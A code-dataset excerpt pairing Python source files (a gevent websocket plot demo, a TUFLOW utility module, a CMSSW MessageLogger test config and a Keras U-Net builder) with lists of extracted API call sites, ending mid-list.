| [((79, 93), 'bottle.route', 'route', (['"""/todo"""'], {}), "('/todo')\n", (84, 93), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((347, 374), 'bottle.route', 'route', (['"""/new"""'], {'method': '"""GET"""'}), "('/new', method='GET')\n", (352, 374), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((837, 870), 'bottle.route', 'route', (['"""/do_insert"""'], {'method': '"""GET"""'}), "('/do_insert', method='GET')\n", (842, 870), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((917, 954), 'bottle.route', 'route', (['"""/edit/<no:int>"""'], {'method': '"""GET"""'}), "('/edit/<no:int>', method='GET')\n", (922, 954), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((1669, 1702), 'bottle.route', 'route', (['"""/find_edit"""'], {'method': '"""GET"""'}), "('/find_edit', method='GET')\n", (1674, 1702), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((1804, 1843), 'bottle.route', 'route', (['"""/delete/<no:int>"""'], {'method': '"""GET"""'}), "('/delete/<no:int>', method='GET')\n", (1809, 1843), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((2043, 2078), 'bottle.route', 'route', (['"""/find_delete"""'], {'method': '"""GET"""'}), "('/find_delete', method='GET')\n", (2048, 2078), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((2183, 2194), 'bottle.debug', 'debug', (['(True)'], {}), '(True)\n', (2188, 2194), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((2195, 2213), 'bottle.run', 'run', ([], {'reloader': '(True)'}), '(reloader=True)\n', (2198, 2213), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((122, 148), 'sqlite3.connect', 'sqlite3.connect', (['"""todo.db"""'], {}), "('todo.db')\n", (137, 148), False, 'import sqlite3\n'), ((289, 324), 'bottle.template', 'template', (['"""make_table"""'], {'rows': 'result'}), "('make_table', rows=result)\n", (297, 324), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((890, 906), 'bottle.redirect', 'redirect', (['"""/new"""'], {}), "('/new')\n", (898, 906), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((1732, 1760), 'bottle.request.GET.editdata.strip', 'request.GET.editdata.strip', ([], {}), '()\n', (1758, 1760), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((1765, 1793), 'bottle.redirect', 'redirect', (["('/edit/' + id_edit)"], {}), "('/edit/' + id_edit)\n", (1773, 1793), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((1879, 1905), 'sqlite3.connect', 'sqlite3.connect', (['"""todo.db"""'], {}), "('todo.db')\n", (1894, 1905), False, 'import sqlite3\n'), ((2023, 2040), 'bottle.redirect', 'redirect', (['"""/todo"""'], {}), "('/todo')\n", (2031, 2040), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((2110, 2140), 'bottle.request.GET.deletedata.strip', 'request.GET.deletedata.strip', ([], {}), '()\n', (2138, 2140), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((2145, 2177), 'bottle.redirect', 'redirect', (["('/delete/' + id_delete)"], {}), "('/delete/' + id_delete)\n", (2153, 2177), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((430, 454), 'bottle.request.GET.task.strip', 'request.GET.task.strip', ([], {}), '()\n', (452, 454), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((470, 496), 'sqlite3.connect', 'sqlite3.connect', (['"""todo.db"""'], {}), "('todo.db')\n", (485, 496), False, 'import sqlite3\n'), ((674, 691), 'bottle.redirect', 'redirect', (['"""/todo"""'], {}), "('/todo')\n", (682, 691), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((809, 833), 'bottle.template', 'template', (['"""new_task.tpl"""'], {}), "('new_task.tpl')\n", (817, 833), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((1014, 1038), 'bottle.request.GET.task.strip', 'request.GET.task.strip', ([], {}), '()\n', (1036, 1038), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((1056, 1082), 'bottle.request.GET.status.strip', 'request.GET.status.strip', ([], {}), '()\n', (1080, 1082), False, 'from bottle import route, run, debug, template, request, redirect\n'), ((1187, 1213), 'sqlite3.connect', 'sqlite3.connect', (['"""todo.db"""'], {}), "('todo.db')\n", (1202, 1213), False, 'import sqlite3\n'), ((1454, 1480), 'sqlite3.connect', 'sqlite3.connect', (['"""todo.db"""'], {}), "('todo.db')\n", (1469, 1480), False, 'import sqlite3\n'), ((1624, 1666), 'bottle.template', 'template', (['"""edit_task"""'], {'old': 'cur_data', 'no': 'no'}), "('edit_task', old=cur_data, no=no)\n", (1632, 1666), False, 'from bottle import route, run, debug, template, request, redirect\n')] |
from __future__ import print_function
"""
This example generates random data and plots a graph in the browser.
Run it using Gevent directly using:
$ python plot_graph.py
Or with an Gunicorn wrapper:
$ gunicorn -k "geventwebsocket.gunicorn.workers.GeventWebSocketWorker" \
plot_graph:resource
"""
import gevent
import random
from geventwebsocket import WebSocketServer, WebSocketApplication, Resource
from geventwebsocket._compat import range_type
class PlotApplication(WebSocketApplication):
def on_open(self):
for i in range_type(10000):
self.ws.send("0 %s %s\n" % (i, random.random()))
gevent.sleep(0.1)
def on_close(self, reason):
print("Connection Closed!!!", reason)
def static_wsgi_app(environ, start_response):
start_response("200 OK", [("Content-Type", "text/html")])
return open("plot_graph.html").readlines()
resource = Resource([
('/', static_wsgi_app),
('/data', PlotApplication)
])
if __name__ == "__main__":
server = WebSocketServer(('', 8000), resource, debug=True)
server.serve_forever()
| [
"gevent.sleep",
"geventwebsocket.WebSocketServer",
"geventwebsocket._compat.range_type",
"random.random",
"geventwebsocket.Resource"
]
| [((914, 976), 'geventwebsocket.Resource', 'Resource', (["[('/', static_wsgi_app), ('/data', PlotApplication)]"], {}), "([('/', static_wsgi_app), ('/data', PlotApplication)])\n", (922, 976), False, 'from geventwebsocket import WebSocketServer, WebSocketApplication, Resource\n'), ((1028, 1077), 'geventwebsocket.WebSocketServer', 'WebSocketServer', (["('', 8000)", 'resource'], {'debug': '(True)'}), "(('', 8000), resource, debug=True)\n", (1043, 1077), False, 'from geventwebsocket import WebSocketServer, WebSocketApplication, Resource\n'), ((555, 572), 'geventwebsocket._compat.range_type', 'range_type', (['(10000)'], {}), '(10000)\n', (565, 572), False, 'from geventwebsocket._compat import range_type\n'), ((647, 664), 'gevent.sleep', 'gevent.sleep', (['(0.1)'], {}), '(0.1)\n', (659, 664), False, 'import gevent\n'), ((617, 632), 'random.random', 'random.random', ([], {}), '()\n', (630, 632), False, 'import random\n')] |
"""
Summary:
Utility Functions that could be helpful in any part of the API.
All functions that are likely to be called across a number of classes
and Functions in the API should be grouped here for convenience.
Author:
<NAME>
Created:
01 Apr 2016
Copyright:
<NAME> 2016
TODO: This module, like a lot of other probably, needs reviewing for how
'Pythonic' t is. There are a lot of places where generators,
comprehensions, maps, etc should be used to speed things up and make
them a bit clearer.
More importantly there are a lot of places using '==' compare that
should be using 'in' etc. This could cause bugs and must be fixed
soon.
Updates:
"""
from __future__ import unicode_literals
import re
import os
import operator
import logging
logger = logging.getLogger(__name__)
"""logging references with a __name__ set to this module."""
# def resolveSeDecorator(se_vals, path):
# """Decorator function for replacing Scen/Evt placholders.
#
# Checks fro scenario and event placeholders in the return value of a
# function and replaces them with corresponding values if found.
#
# Args:
# se_vals(dict): standard scenario/event dictionary in the format:
# {'scenario': {
# """
# def seDecorator(func):
# def seWrapper(*args, **kwargs):
# result = func(*args, **kwargs)
#
# if '~' in result:
# # Check for scenarion stuff
# for key, val in self.se_vals['scenario'].items():
# temp = '~' + key + '~'
# if temp in result:
# result = result.replace(temp, val)
# # Check for event stuff
# for key, val in self.se_vals['event'].items():
# temp = '~' + key + '~'
# if temp in result:
# result = result.replace(temp, val)
# return result
# return seWrapper
# return seDecorator
def formatFloat(value, no_of_dps, ignore_empty_str=True):
"""Format a float as a string to given number of decimal places.
Args:
value(float): the value to format.
no_of_dps(int): number of decimal places to format to.
ignore_empty_str(True): return a stripped blank string if set to True.
Return:
str - the formatted float.
Raises:
ValueError - if value param is not type float.
"""
if ignore_empty_str and not isNumeric(value) and str(value).strip() == '':
return str(value).strip()
if not isNumeric(value):
raise ValueError
decimal_format = '%0.' + str(no_of_dps) + 'f'
value = decimal_format % float(value)
return value
def checkFileType(file_path, ext):
"""Checks a file to see that it has the right extension.
Args:
file_path (str): The file path to check.
ext (List): list containing the extension types to match the file
against.
Returns:
True if the extension matches the ext variable given or False if not.
"""
file_ext = os.path.splitext(file_path)[1]
logger.info('File ext = ' + file_ext)
for e in ext:
if e == file_ext:
return True
else:
return False
def isNumeric(s):
"""Tests if string is a number or not.
Simply tries to convert it and catches the error if launched.
Args:
s (str): string to test number compatibility.
Returns:
Bool - True if number. False if not.
"""
try:
float(s)
return True
except (ValueError, TypeError):
return False
def encodeStr(value):
try:
value = unicode(value, "utf-8")
return value
except (UnicodeDecodeError, NameError, TypeError):
return value
def isString(value):
"""Tests a given value to see if it is an instance of basestring or not.
Note:
This function should be used whenever testing this as it accounts for
both Python 2.7+ and 3.2+ variations of string.
Args:
value: the variable to test.
Returns:
Bool - True if value is a unicode str (basestring type)
"""
try:
return isinstance(value, basestring)
except NameError:
return isinstance(value, str)
# if not isinstance(value, basestring):
# return False
#
# return True
def isList(value):
"""Test a given value to see if it is a list or not.
Args:
value: the variable to test for list type.
Returns:
True if value is of type list; False otherwise.
"""
if not isinstance(value, list):
return False
return True
def arrayToString(self, str_array):
"""Convert a list to a String
Creates one string by adding each part of the array to one string using
', '.join()
Args:
str_array (List): to convert into single string.
Returns:
str - representaion of the array joined together.
Raises:
ValueError: if not contents of list are instances of basestring.
"""
if not isinstance(str_array[0], basestring):
raise ValueError('Array values are not strings')
out_string = ''
out_string = ', '.join(str_array)
return out_string
def findSubstringInList(substr, the_list):
"""Returns a list containing the indices that a substring was found at.
Uses a generator to quickly find all indices that str appears in.
Args:
substr (str): the sub string to search for.
the_list (List): a list containing the strings to search.
Returns:
tuple - containing:
* a list with the indices that the substring was found in
(this list can be empty if no matches were found).
* an integer containing the number of elements it was found in.
"""
indices = [i for i, s in enumerate(the_list) if substr in s]
return indices, len(indices)
def findMax(val1, val2):
"""Returns tuple containing min, max of two values
Args:
val1: first integer or float.
val2: second integer or float.
Returns:
tuple - containing:
* lower value
* higher value
* False if not same or True if the same.
"""
if val1 == val2:
return val1, val2, True
elif val1 > val2:
return val2, val1, False
else:
return val1, val2, False
def fileExtensionWithoutPeriod(filepath, name_only=False):
"""Extracts the extension without '.' from filepath.
The extension will always be converted to lower case before returning.
Args:
filepath (str): A full filepath if name_only=False. Otherwise a file
name with extension if name_only=True.
name_only (bool): True if filepath is only filename.extension.
"""
if name_only:
file, ext = os.path.splitext(filepath)
else:
path, filename = os.path.split(filepath)
file, ext = os.path.splitext(filename)
ext = ext[1:]
return ext.lower()
def findWholeWord(w):
"""Find a whole word amoungst a string."""
return re.compile(r'\b({0})\b'.format(w), flags=re.IGNORECASE).search
def convertRunOptionsToSEDict(options):
"""Converts tuflow command line options to scenario/event dict.
Tuflow uses command line option (e.g. -s1 blah -e1 blah) to set scenario
values which can either be provided on the command line or through the
FMP run form. The TuflowLoader can use these arguments but requires a
slightly different setup.
This function converts the command line string into the scenarion and
event dictionary expected by the TuflowLoader.
Args:
options(str): command line options.
Return:
dict - {'scenario': {'s1': blah}, 'event': {'e1': blah}}
Raises:
AttributeError: if both -s and -s1 or -e and -e1 occurr in the options
string. -x and -x1 are treated as the same variable by tuflow and
one of the values would be ignored.
"""
if ' -s ' in options and ' -s1 ' in options:
raise AttributeError
if ' -e ' in options and ' -e2 ' in options:
raise AttributeError
outvals = {'scenario': {}, 'event': {}}
vals = options.split(" ")
for i in range(len(vals)):
if vals[i].startswith('-s'):
outvals['scenario'][vals[i][1:]] = vals[i + 1]
elif vals[i].startswith('-e'):
outvals['event'][vals[i][1:]] = vals[i + 1]
return outvals
def getSEResolvedFilename(filename, se_vals):
"""Replace a tuflow placeholder filename with the scenario/event values.
Replaces all of the placholder values (e.g. ~s1~_~e1~) in a tuflow
filename with the corresponding values provided in the run options string.
If the run options flags are not found in the filename their values will
be appended to the end of the string.
The setup of the returned filename is always the same:
- First replace all placeholders with corresponding flag values.
- s1 == s and e1 == e.
- Append additional e values to end with '_' before first and '+' before others.
- Append additional s values to end with '_' before first and '+' before others.
Args:
filename(str): the filename to update.
se_vals(str): the run options string containing the 's' and
'e' flags and their corresponding values.
Return:
str - the updated filename.
"""
if not 'scenario' in se_vals.keys():
se_vals['scenario'] = {}
if not 'event' in se_vals.keys():
se_vals['event'] = {}
# Format the key value pairs into a list and combine the scenario and
# event list together and sort them into e, e1, e2, s, s1, s2 order.
scen_keys = ['-' + a for a in se_vals['scenario'].keys()]
scen_vals = se_vals['scenario'].values()
event_keys = ['-' + a for a in se_vals['event'].keys()]
event_vals = se_vals['event'].values()
scen = [list(a) for a in zip(scen_keys, scen_vals)]
event = [list(a) for a in zip(event_keys, event_vals)]
se_vals = scen + event
vals = sorted(se_vals, key=operator.itemgetter(0))
# Build a new filename by replacing or adding the flag values
outname = filename
in_e = False
for v in vals:
placeholder = ''.join(['~', v[0][1:], '~'])
if placeholder in filename:
outname = outname.replace(placeholder, v[1])
elif v[0] == '-e1' and '~e~' in filename and not '-e' in se_vals:
outname = outname.replace('~e~', v[1])
elif v[0] == '-s1' and '~s~' in filename and not '-s' in se_vals:
outname = outname.replace('~s~', v[1])
# DEBUG - CHECK THIS IS TRUE!
elif v[0] == '-e' and '~e1~' in filename:
outname = outname.replace('~e1~', v[1])
elif v[0] == '-s' and '~s1~' in filename:
outname = outname.replace('~s1~', v[1])
else:
if v[0].startswith('-e'):
if not in_e:
prefix = '_'
else:
prefix = '+'
in_e = True
elif v[0].startswith('-s'):
if in_e:
prefix = '_'
else:
prefix = '+'
in_e = False
outname += prefix + v[1]
return outname
def enum(*sequential, **named):
"""Creates a new enum using the values handed to it.
Taken from <NAME> on StackOverflow:
http://stackoverflow.com/questions/36932/how-can-i-represent-an-enum-in-python
Examples:
Can be created and accessed using:
>>> Numbers = enum('ZERO', 'ONE', 'TWO')
>>> Numbers.ZERO
0
>>> Numbers.ONE
1
Or reverse the process o get the name from the value:
>>> Numbers.reverse_mapping['three']
'THREE'
"""
enums = dict(zip(sequential, range(len(sequential))), **named)
reverse = dict((value, key) for key, value in enums.items())
enums['reverse_mapping'] = reverse
return type(str('Enum'), (), enums)
class FileQueue(object):
"""Queueing class for storing data to go into the database
"""
def __init__(self):
self.items = []
def isEmpty(self):
"""Returns True if list is empty
"""
return self.items == []
def enqueue(self, item):
"""Add an item to the queue
"""
self.items.insert(0, item)
def dequeue(self):
"""Pop an item from the front of the queue.
"""
return self.items.pop()
def size(self):
"""Get the size of the queue
"""
return len(self.items)
class LoadStack(object):
"""Stack class for loading logic."""
def __init__(self, max_size=-1):
self.items = []
self.max_size = max_size
def isEmpty(self):
"""Return True if stack is empty."""
return self.items == []
def add(self, item):
"""Add an item to the stack.
Args:
item: the item to add to the stack.
Raises:
IndexError: if max_size has been set and adding another item would
make the stack bigger than max size.
"""
if not self.max_size == -1:
if len(self.items) + 1 > self.max_size:
raise IndexError
self.items.append(item)
def pop(self):
"""Get an item From the stack.
Return:
item from the top of the stack.
Raises:
IndexError: if the stack is empty.
"""
if len(self.items) == 0:
raise IndexError
return self.items.pop()
def peek(self):
"""See what the next item on the stack is, but don't remove it.
Return:
item from the top of the stack.
Raises:
IndexError: if the stack is empty.
"""
if len(self.items) == 0:
raise IndexError
return self.items[-1]
def size(self):
"""Return the number of items in the stack."""
return len(self.items)
| [
"logging.getLogger",
"operator.itemgetter",
"os.path.splitext",
"os.path.split"
]
| [((902, 929), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (919, 929), False, 'import logging\n'), ((3281, 3308), 'os.path.splitext', 'os.path.splitext', (['file_path'], {}), '(file_path)\n', (3297, 3308), False, 'import os\n'), ((7209, 7235), 'os.path.splitext', 'os.path.splitext', (['filepath'], {}), '(filepath)\n', (7225, 7235), False, 'import os\n'), ((7273, 7296), 'os.path.split', 'os.path.split', (['filepath'], {}), '(filepath)\n', (7286, 7296), False, 'import os\n'), ((7318, 7344), 'os.path.splitext', 'os.path.splitext', (['filename'], {}), '(filename)\n', (7334, 7344), False, 'import os\n'), ((10597, 10619), 'operator.itemgetter', 'operator.itemgetter', (['(0)'], {}), '(0)\n', (10616, 10619), False, 'import operator\n')] |
# u28_cerr_cfg.py:
#
# Non-regression test configuration file for MessageLogger service:
# distinct threshold level for linked destination, where
#
import FWCore.ParameterSet.Config as cms
process = cms.Process("TEST")
import FWCore.Framework.test.cmsExceptionsFatal_cff
process.options = FWCore.Framework.test.cmsExceptionsFatal_cff.options
process.load("FWCore.MessageService.test.Services_cff")
process.MessageLogger = cms.Service("MessageLogger",
categories = cms.untracked.vstring('preEventProcessing'),
destinations = cms.untracked.vstring('cerr'),
statistics = cms.untracked.vstring('cerr_stats'),
cerr_stats = cms.untracked.PSet(
threshold = cms.untracked.string('WARNING'),
output = cms.untracked.string('cerr')
),
u28_output = cms.untracked.PSet(
threshold = cms.untracked.string('INFO'),
noTimeStamps = cms.untracked.bool(True),
preEventProcessing = cms.untracked.PSet(
limit = cms.untracked.int32(0)
)
)
)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(3)
)
process.source = cms.Source("EmptySource")
process.sendSomeMessages = cms.EDAnalyzer("UnitTestClient_A")
process.p = cms.Path(process.sendSomeMessages)
| [
"FWCore.ParameterSet.Config.untracked.string",
"FWCore.ParameterSet.Config.Source",
"FWCore.ParameterSet.Config.untracked.int32",
"FWCore.ParameterSet.Config.Process",
"FWCore.ParameterSet.Config.untracked.vstring",
"FWCore.ParameterSet.Config.untracked.bool",
"FWCore.ParameterSet.Config.Path",
"FWCore.ParameterSet.Config.EDAnalyzer"
]
| [((201, 220), 'FWCore.ParameterSet.Config.Process', 'cms.Process', (['"""TEST"""'], {}), "('TEST')\n", (212, 220), True, 'import FWCore.ParameterSet.Config as cms\n'), ((1107, 1132), 'FWCore.ParameterSet.Config.Source', 'cms.Source', (['"""EmptySource"""'], {}), "('EmptySource')\n", (1117, 1132), True, 'import FWCore.ParameterSet.Config as cms\n'), ((1161, 1195), 'FWCore.ParameterSet.Config.EDAnalyzer', 'cms.EDAnalyzer', (['"""UnitTestClient_A"""'], {}), "('UnitTestClient_A')\n", (1175, 1195), True, 'import FWCore.ParameterSet.Config as cms\n'), ((1209, 1243), 'FWCore.ParameterSet.Config.Path', 'cms.Path', (['process.sendSomeMessages'], {}), '(process.sendSomeMessages)\n', (1217, 1243), True, 'import FWCore.ParameterSet.Config as cms\n'), ((473, 516), 'FWCore.ParameterSet.Config.untracked.vstring', 'cms.untracked.vstring', (['"""preEventProcessing"""'], {}), "('preEventProcessing')\n", (494, 516), True, 'import FWCore.ParameterSet.Config as cms\n'), ((537, 566), 'FWCore.ParameterSet.Config.untracked.vstring', 'cms.untracked.vstring', (['"""cerr"""'], {}), "('cerr')\n", (558, 566), True, 'import FWCore.ParameterSet.Config as cms\n'), ((585, 620), 'FWCore.ParameterSet.Config.untracked.vstring', 'cms.untracked.vstring', (['"""cerr_stats"""'], {}), "('cerr_stats')\n", (606, 620), True, 'import FWCore.ParameterSet.Config as cms\n'), ((1064, 1086), 'FWCore.ParameterSet.Config.untracked.int32', 'cms.untracked.int32', (['(3)'], {}), '(3)\n', (1083, 1086), True, 'import FWCore.ParameterSet.Config as cms\n'), ((679, 710), 'FWCore.ParameterSet.Config.untracked.string', 'cms.untracked.string', (['"""WARNING"""'], {}), "('WARNING')\n", (699, 710), True, 'import FWCore.ParameterSet.Config as cms\n'), ((729, 757), 'FWCore.ParameterSet.Config.untracked.string', 'cms.untracked.string', (['"""cerr"""'], {}), "('cerr')\n", (749, 757), True, 'import FWCore.ParameterSet.Config as cms\n'), ((822, 850), 'FWCore.ParameterSet.Config.untracked.string', 'cms.untracked.string', (['"""INFO"""'], {}), "('INFO')\n", (842, 850), True, 'import FWCore.ParameterSet.Config as cms\n'), ((875, 899), 'FWCore.ParameterSet.Config.untracked.bool', 'cms.untracked.bool', (['(True)'], {}), '(True)\n', (893, 899), True, 'import FWCore.ParameterSet.Config as cms\n'), ((970, 992), 'FWCore.ParameterSet.Config.untracked.int32', 'cms.untracked.int32', (['(0)'], {}), '(0)\n', (989, 992), True, 'import FWCore.ParameterSet.Config as cms\n')] |
"""
Authors: <NAME>, <NAME>
E-mail: <EMAIL>, <EMAIL>
Course: Mashinski vid, FEEIT, Spring 2021
Date: 09.03.2021
Description: function library
model operations: construction, loading, saving
Python version: 3.6
"""
# python imports
from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate
from keras.models import Model, model_from_json
def load_model(model_path, weights_path):
"""
loads a pre-trained model configuration and calculated weights
:param model_path: path of the serialized model configuration file (.json) [string]
:param weights_path: path of the serialized model weights file (.h5) [string]
:return: model - keras model object
"""
# --- load model configuration ---
json_file = open(model_path, 'r')
model_json = json_file.read()
json_file.close()
model = model_from_json(model_json) # load model architecture
model.load_weights(weights_path) # load weights
return model
def construct_model_unet_orig(input_shape):
"""
construct semantic segmentation model architecture (encoder-decoder)
:param input_shape: list of input dimensions (height, width, depth) [tuple]
:return: model - Keras model object
"""
input = Input(shape=input_shape)
# --- encoder ---
conv1 = Conv2D(filters=64, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(input)
conv11 = Conv2D(filters=64, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(conv1)
pool1 = MaxPool2D(pool_size=(2, 2))(conv11)
conv2 = Conv2D(filters=128, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(pool1)
conv22 = Conv2D(filters=128, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(conv2)
pool2 = MaxPool2D(pool_size=(2, 2))(conv22)
conv3 = Conv2D(filters=256, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(pool2)
conv33 = Conv2D(filters=256, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(conv3)
pool3 = MaxPool2D(pool_size=(2, 2))(conv33)
conv4 = Conv2D(filters=512, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(pool3)
conv44 = Conv2D(filters=512, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(conv4)
pool4 = MaxPool2D(pool_size=(2, 2))(conv44)
# --- decoder ---
conv5 = Conv2D(filters=1024, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(pool4)
conv55 = Conv2D(filters=512, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(conv5)
up1 = UpSampling2D(size=(2, 2))(conv55)
merge1 = Concatenate(axis=3)([conv44, up1])
deconv1 = Conv2DTranspose(filters=512, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(merge1)
deconv11 = Conv2DTranspose(filters=256, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(deconv1)
up2 = UpSampling2D(size=(2, 2))(deconv11)
merge2 = Concatenate(axis=3)([conv33, up2])
deconv2 = Conv2DTranspose(filters=256, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(merge2)
deconv22 = Conv2DTranspose(filters=128, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(deconv2)
up3 = UpSampling2D(size=(2, 2))(deconv22)
merge3 = Concatenate(axis=3)([conv22, up3])
deconv3 = Conv2DTranspose(filters=128, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(merge3)
deconv33 = Conv2DTranspose(filters=64, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(deconv3)
up4 = UpSampling2D(size=(2, 2))(deconv33)
merge4 = Concatenate(axis=3)([conv11, up4])
deconv4 = Conv2DTranspose(filters=64, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(merge4)
deconv44 = Conv2DTranspose(filters=64, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(deconv4)
output = Conv2DTranspose(filters=input_shape[2], kernel_size=1, padding='same', activation='sigmoid')(deconv44)
model = Model(input=input, output=output)
return model
| [
"keras.layers.Conv2D",
"keras.layers.UpSampling2D",
"keras.layers.Concatenate",
"keras.models.model_from_json",
"keras.layers.Input",
"keras.models.Model",
"keras.layers.Conv2DTranspose",
"keras.layers.MaxPool2D"
]
| [((871, 898), 'keras.models.model_from_json', 'model_from_json', (['model_json'], {}), '(model_json)\n', (886, 898), False, 'from keras.models import Model, model_from_json\n'), ((1273, 1297), 'keras.layers.Input', 'Input', ([], {'shape': 'input_shape'}), '(shape=input_shape)\n', (1278, 1297), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((4332, 4365), 'keras.models.Model', 'Model', ([], {'input': 'input', 'output': 'output'}), '(input=input, output=output)\n', (4337, 4365), False, 'from keras.models import Model, model_from_json\n'), ((1334, 1438), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(64)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=64, kernel_size=3, activation='relu', padding='same',\n kernel_initializer='he_normal')\n", (1340, 1438), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((1455, 1559), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(64)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=64, kernel_size=3, activation='relu', padding='same',\n kernel_initializer='he_normal')\n", (1461, 1559), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((1575, 1602), 'keras.layers.MaxPool2D', 'MaxPool2D', ([], {'pool_size': '(2, 2)'}), '(pool_size=(2, 2))\n', (1584, 1602), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((1624, 1729), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(128)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=128, kernel_size=3, activation='relu', padding='same',\n kernel_initializer='he_normal')\n", (1630, 1729), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((1746, 1851), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(128)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=128, kernel_size=3, activation='relu', padding='same',\n kernel_initializer='he_normal')\n", (1752, 1851), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((1867, 1894), 'keras.layers.MaxPool2D', 'MaxPool2D', ([], {'pool_size': '(2, 2)'}), '(pool_size=(2, 2))\n', (1876, 1894), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((1916, 2021), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(256)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=256, kernel_size=3, activation='relu', padding='same',\n kernel_initializer='he_normal')\n", (1922, 2021), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((2038, 2143), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(256)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=256, kernel_size=3, activation='relu', padding='same',\n kernel_initializer='he_normal')\n", (2044, 2143), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((2159, 2186), 'keras.layers.MaxPool2D', 'MaxPool2D', ([], {'pool_size': '(2, 2)'}), '(pool_size=(2, 2))\n', (2168, 2186), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((2208, 2313), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(512)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=512, kernel_size=3, activation='relu', padding='same',\n kernel_initializer='he_normal')\n", (2214, 2313), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((2330, 2435), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(512)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=512, kernel_size=3, activation='relu', padding='same',\n kernel_initializer='he_normal')\n", (2336, 2435), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((2451, 2478), 'keras.layers.MaxPool2D', 'MaxPool2D', ([], {'pool_size': '(2, 2)'}), '(pool_size=(2, 2))\n', (2460, 2478), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((2523, 2629), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(1024)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=1024, kernel_size=3, activation='relu', padding='same',\n kernel_initializer='he_normal')\n", (2529, 2629), False, 'from keras.layers import Conv2D, Conv2DTranspose, 